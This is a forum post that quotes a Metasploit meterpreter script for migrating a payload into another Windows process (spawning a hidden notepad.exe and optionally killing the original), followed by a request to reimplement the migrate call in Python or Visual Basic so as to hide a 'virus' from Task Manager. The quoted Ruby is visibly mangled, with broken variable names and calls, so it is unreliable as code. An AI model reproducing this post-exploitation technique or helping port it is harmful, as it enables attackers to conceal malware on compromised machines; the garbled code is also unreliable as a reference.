Forum Thread: Meterpreter Migrate Help Pls

##
# WARNING: **sploit no longer maintains or accepts meterpreter scripts.
# If you'd like to imporve this script, please try to port it as a post
# module instead. Thank you.
##

#
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.
#

spawn = false
kill = false
target_pid = nil
target_name = nil

opts = Rex::Parser::Arguments.new(
"-h" => false, "Help menu." ,
"-f" => false, "Launch a process and migrate into the new process",
"-p" => true , "PID to migrate to.",
"-k" => false, "Kill original process.",
"-n" => true, "Migrate into the first process with this executable name (explorer.exe)"
)

opts.parse(args) { |opt, idx, val|
case opt
when "-f"
spawn = true
when "-k"
kill = true
when "-p"
targetpid = val.toi
when "-n"
targetname = val.tos
when "-h"
print_line(opts.usage)
raise Rex::Script::Completed
else
print_line(opts.usage)
raise Rex::Script::Completed
end
}

# Creates a temp notepad.exe to migrate to depending the architecture.
def createtempproc()
# Use the system path for executable to run
cmd = "notepad.exe"
# run hidden
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
return proc.pid
end

# In case no option is provided show help
if args.length == 0
print_line(opts.usage)
raise Rex::Script::Completed
end

### Main ###

if client.platform == 'windows'
server = client.sys.process.open
original_pid = server.pid
print_status("Current server process: #{server.name} (#{server.pid})")

if spawn
print_status("Spawning notepad.exe process to migrate to")
targetpid = createtemp_proc
end

if targetname and not targetpid
target_pid = client.sys.processtarget_name
if not target_pid
printstatus("Could not identify the process ID for #{targetname}")
raise Rex::Script::Completed
end
end

begin
printgood("Migrating to #{targetpid}")
client.core.migrate(target_pid)
print_good("Successfully migrated to process #{}")
rescue ::Exception => e
print_error("Could not migrate in to process.")
print_error(e)
end

if kill
printstatus("Killing original process with PID #{originalpid}")
client.sys.process.kill(original_pid)
printgood("Successfully killed process with PID #{originalpid}")
end
end

— Metasploit

Langugage = RUBY

Friends The code you see above is a code taken from metasploit in Linux. Most of Metasploit Users Know When you take Payload to the other side and listen to it, you can hide your virus from places like Task Manager with "migrate" command or you can show it like another program.

I've studied these codes, and actually it's an easy code with 96 lines. Of all the 96 lines of code, only 1 line does the actual job.

client.core.migrate(target_pid)

in the above code there is a variable named "target_pid" and this is the value of the program "PID" we want to hide. So far I have no problem with the main responsibility of how to do this in visual basic or python. what is actually client.core.migrate? In python or visual basic How do I use it?

Sorry My English may be bad.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active